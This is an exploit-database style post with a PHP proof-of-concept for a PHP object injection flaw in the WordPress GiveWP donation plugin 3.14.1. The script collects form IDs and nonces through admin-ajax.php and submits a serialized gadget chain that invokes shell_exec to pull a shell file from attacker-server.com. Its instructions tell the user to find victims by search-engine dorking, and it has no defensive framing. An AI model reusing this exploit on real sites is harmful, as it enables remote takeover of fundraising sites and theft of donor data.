WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

=============================================================================================================================================
| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://givewp.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 78 set your file link.

[+] Line 127. set your target.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php
class GiveWPExploit {
private $targetUrl;
private $headers;

public function __construct($targetUrl) {
$this->targetUrl = $targetUrl;
$this->headers = array(
‘Content-Type: application/x-www-form-urlencoded’
);
}

public function check() {
$response = $this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, array(‘action’ => ‘give_form_search’));
if (!$response || $response[‘http_code’] != 200) {
echo “Failed to retrieve form list.\n”;
return false;
}

$forms = json_decode($response[‘body’], true);
if (empty($forms)) {
echo “No forms found.\n”;
return false;
}

echo “Successfully retrieved form list. Available Form IDs: ” . implode(‘, ‘, array_column($forms, ‘id’)) . “\n”;
return $forms;
}

public function exploit() {
$forms = $this->check();
if (!$forms) {
return;
}

$selectedForm = $forms[array_rand($forms)];
$validForm = $this->retrieveAndAnalyzeForm($selectedForm[‘id’]);

if (!$validForm) {
echo “Failed to retrieve a valid form for exploitation.\n”;
return;
}

echo “Using Form ID: ” . $validForm[‘give_form_id’] . ” for exploitation.\n”;
$this->sendExploitRequest($validForm);
}

private function retrieveAndAnalyzeForm($formId) {
$response = $this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, array(
‘action’ => ‘give_donation_form_nonce’,
‘give_form_id’ => $formId
));

if (!$response || $response[‘http_code’] != 200) {
return false;
}

$formData = json_decode($response[‘body’], true);
$giveFormId = $formId;
$giveFormHash = $formData[‘data’];
$givePriceId = ‘0’; // Default price ID
$giveAmount = ‘$10.00’; // Default amount

if (!$giveFormHash) {
return false;
}

return array(
‘give_form_id’ => $giveFormId,
‘give_form_hash’ => $giveFormHash,
‘give_price_id’ => $givePriceId,
‘give_amount’ => $giveAmount
);
}

private function sendExploitRequest($validForm) {
// URL of the malicious file to be fetched
$remoteFileUrl = ‘http://attacker-server.com/malicious-file.php’;

// Payload that uses file_get_contents to fetch the remote file
$payload = sprintf(
‘O:19:”Stripe\\\\StripeObject”:1:{s:10:”\\0*\\0_values”;a:1:{s:3:”foo”;O:62:”Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData”:1:{s:8:”userInfo”;a:1:{s:7:”address”;O:4:”Give”:1:{s:12:”\\0*\\0container”;O:33:”Give\\\\Vendors\\\\Faker\\\\ValidGenerator”:3:{s:10:”shell_exec”;s:12:”\\0*\\0generator”;O:34:”Give\\\\Onboarding\\\\SettingsRepository”:1:{s:11:”\\0*\\0settings”;a:1:{s:8:”address1″;s:%d:”%s”;}}}}}}}}’,
strlen($remoteFileUrl),
$remoteFileUrl
);

$data = array(
‘give-form-id’ => $validForm[‘give_form_id’],
‘give-form-hash’ => $validForm[‘give_form_hash’],
‘give-price-id’ => $validForm[‘give_price_id’],
‘give-amount’ => $validForm[‘give_amount’],
‘give_first’ => ‘Test’,
‘give_last’ => ‘User’,
‘give_email’ => ‘[email protected]’,
‘give_title’ => $payload,
‘give-gateway’ => ‘offline’,
‘action’ => ‘give_process_donation’
);

$this->sendRequest(‘POST’, $this->targetUrl . ‘/wp-admin/admin-ajax.php’, $data);
}

private function sendRequest($method, $url, $data) {
$options = array(
‘http’ => array(
‘method’ => $method,
‘header’ => implode(“\r\n”, $this->headers),
‘content’ => http_build_query($data)
)
);

$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === false) {
return false;
}

return array(
‘http_code’ => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code
‘body’ => $result
);
}
}

// Usage
$exploit = new GiveWPExploit(‘http://127.0.0.1’);
$exploit->exploit();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================